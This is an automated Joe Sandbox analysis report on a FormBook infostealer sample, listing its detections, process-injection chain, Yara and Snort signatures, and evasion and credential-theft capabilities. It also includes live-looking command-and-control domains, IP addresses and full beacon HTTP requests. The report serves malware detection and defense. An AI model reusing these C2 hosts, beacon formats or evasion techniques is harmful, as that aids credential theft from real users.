Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nJ8mJTmMf0.exe

Overview

General Information

Sample name:nJ8mJTmMf0.exe
renamed because original name is a hash value
Original sample name:8e2c2721d94a488e27b363152a56ea079a7932b41144b71f385d8b37ca70aa2e.exe
Analysis ID:1466073
MD5:dd560917fd1166f8f9a3ca565e1c3957
SHA1:07e6f2b8aa9410f9a649353da7ca692b14d4a5c4
SHA256:8e2c2721d94a488e27b363152a56ea079a7932b41144b71f385d8b37ca70aa2e
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • nJ8mJTmMf0.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\nJ8mJTmMf0.exe" MD5: DD560917FD1166F8F9A3CA565E1C3957)
    • svchost.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\nJ8mJTmMf0.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe (PID: 1364 cmdline: "C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PresentationHost.exe (PID: 7616 cmdline: "C:\Windows\SysWOW64\PresentationHost.exe" MD5: C6671F8B9F073785FD617661AD1F1C45)
          • firefox.exe (PID: 7764 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x47627:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x30d46:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.4121800336.0000000004A74000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0xaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      Click to see the 8 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2cda3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x164c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dba3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x172c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", CommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", ParentImage: C:\Users\user\Desktop\nJ8mJTmMf0.exe, ParentProcessId: 7256, ParentProcessName: nJ8mJTmMf0.exe, ProcessCommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", ProcessId: 7272, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", CommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", ParentImage: C:\Users\user\Desktop\nJ8mJTmMf0.exe, ParentProcessId: 7256, ParentProcessName: nJ8mJTmMf0.exe, ProcessCommandLine: "C:\Users\user\Desktop\nJ8mJTmMf0.exe", ProcessId: 7272, ProcessName: svchost.exe

          Snort Signatures

          Timestamp:07/02/24-14:07:01.922969
          SID:2855464
          Source Port:49738
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:06:46.303031
          SID:2855465
          Source Port:49736
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:08:39.009481
          SID:2855465
          Source Port:49761
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:17.766594
          SID:2855464
          Source Port:49743
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:36.301715
          SID:2855465
          Source Port:49749
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:55.738870
          SID:2855464
          Source Port:49754
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:44.596745
          SID:2855464
          Source Port:49751
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:49.702879
          SID:2855465
          Source Port:49753
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:15.236401
          SID:2855464
          Source Port:49742
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:09:00.595741
          SID:2855464
          Source Port:49763
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:28.626581
          SID:2855464
          Source Port:49746
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:08:31.344522
          SID:2855464
          Source Port:49758
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:22.830857
          SID:2855465
          Source Port:49745
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:59.523620
          SID:2855464
          Source Port:49755
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:42.060544
          SID:2855464
          Source Port:49750
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:08:33.882411
          SID:2855464
          Source Port:49759
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:31.173075
          SID:2855464
          Source Port:49747
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:01.922969
          SID:2856318
          Source Port:49738
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:09.547482
          SID:2855465
          Source Port:49741
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:09:06.390818
          SID:2855465
          Source Port:49765
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:08:04.861584
          SID:2855465
          Source Port:49757
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:08:58.056879
          SID:2855464
          Source Port:49762
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/02/24-14:07:04.478292
          SID:2855464
          Source Port:49739
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.adoby.xyz/ghq5/Avira URL Cloud: Label: malware
          Source: https://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6QzAvira URL Cloud: Label: malware
          Source: http://www.adoby.xyz/ghq5/?wd98XJp=dNjYg/LNb+Btw7/gHk7XSMyPk/zPSOV1YOlLUnvgSo8eic1H8Ppx0PY9ldg0aj+ffPmEFDEyAFk9JBqMQ/w/NLyeMKaPgOi3ekgmu34KkG/nLXsYy1o9wJg=&2hZdq=H6f4RAvira URL Cloud: Label: malware
          Source: http://www.abc8web.com/sm5e/?wd98XJp=o8xG6LBLqhGEFqfWTr3vbfLymD68CBTmrGDPPbcweY6zCsuE8W4/fbHpwlO8ph1RffMeX91soDhoi1OdGkM065Zd4OviC0ZoCrIQ2N2wQupqguS4lzCfvC0=&2hZdq=H6f4RAvira URL Cloud: Label: malware
          Source: https://www.kosherphonestore.com/y0az/?wd98XJp=1StTTN5BDAvira URL Cloud: Label: malware
          Source: http://www.threendresses.com/ecb1/Avira URL Cloud: Label: malware
          Source: http://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz9Nxrj1c/x943R5zeBwNAiK6gnAeQLZ/WlxRJaqzCSDsHaoXTEmVBFAAd8oj/2Yo=&2hZdq=H6f4RAvira URL Cloud: Label: malware
          Source: http://www.abc8web.com/sm5e/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for submitted file
          Source: nJ8mJTmMf0.exeReversingLabs: Detection: 57%
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.4125575598.00000000082C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1978005632.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1977710626.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4121057875.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1978344060.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4121859503.00000000045C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: nJ8mJTmMf0.exeJoe Sandbox ML: detected
          Source: nJ8mJTmMf0.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: PresentationHost.pdbGCTL source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121058852.000000000080E000.00000002.00000001.01000000.00000005.sdmp
          Source: Binary string: wntdll.pdbUGP source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: PresentationHost.pdb source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00664696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00664696
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066C93C FindFirstFileW,FindClose,0_2_0066C93C
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0066C9C7
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0066F200
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0066F35D
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066F65E
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00663A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00663A2B
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00663D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00663D4E
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066BF27
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B1BDA0 FindFirstFileW,FindNextFileW,FindClose,6_2_00B1BDA0
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 4x nop then pop ebx3_2_082E2B35
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 4x nop then xor eax, eax3_2_082E6467
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 4x nop then xor eax, eax6_2_00B097D0

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49736 -> 84.32.84.112:80
          Source: TrafficSnort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.4:49738 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49738 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49739 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49741 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49742 -> 78.111.111.51:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49743 -> 78.111.111.51:80
          Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49745 -> 78.111.111.51:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 172.67.200.242:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 172.67.200.242:80
          Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49749 -> 172.67.200.242:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49753 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 116.213.43.190:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49755 -> 116.213.43.190:80
          Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49757 -> 116.213.43.190:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 109.95.158.127:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49759 -> 109.95.158.127:80
          Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49761 -> 109.95.158.127:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49762 -> 162.0.213.72:80
          Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49763 -> 162.0.213.72:80
          Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49765 -> 162.0.213.72:80
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.adoby.xyz
          Source: Joe Sandbox ViewIP Address: 162.0.213.72 162.0.213.72
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewASN Name: ASFIBERSUNUCUTR ASFIBERSUNUCUTR
          Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: DHOSTING-ASWarsawPolandPL DHOSTING-ASWarsawPolandPL
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006725E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_006725E2
          Source: global trafficHTTP traffic detected: GET /y0az/?wd98XJp=1StTTN5BD+5aXW5ltMxXpzm1HVVSwZLsUdxETJpeMbRSKeJkL8yNVC6cqVCEcPMcPzsub+RoFiososJ7aYXNlWIy6nA9AoQ6GnR0Gmd+weA/r+qlKoAho/M=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.kosherphonestore.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /sm5e/?wd98XJp=o8xG6LBLqhGEFqfWTr3vbfLymD68CBTmrGDPPbcweY6zCsuE8W4/fbHpwlO8ph1RffMeX91soDhoi1OdGkM065Zd4OviC0ZoCrIQ2N2wQupqguS4lzCfvC0=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.abc8web.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz9Nxrj1c/x943R5zeBwNAiK6gnAeQLZ/WlxRJaqzCSDsHaoXTEmVBFAAd8oj/2Yo=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.threendresses.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /2nu3/?wd98XJp=kpCfKF0WzJdSazQmt+Slz7YMxCL88Ck3GTDuMNK/H/Z7+vSkhcWJrxIVRHFhCg6b5G6dYsxeFoEulnLMEOj8SMB4wRe40fAIutKuKCnjbT5TVzUJ6OZr4Zg=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.personalcaresale.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
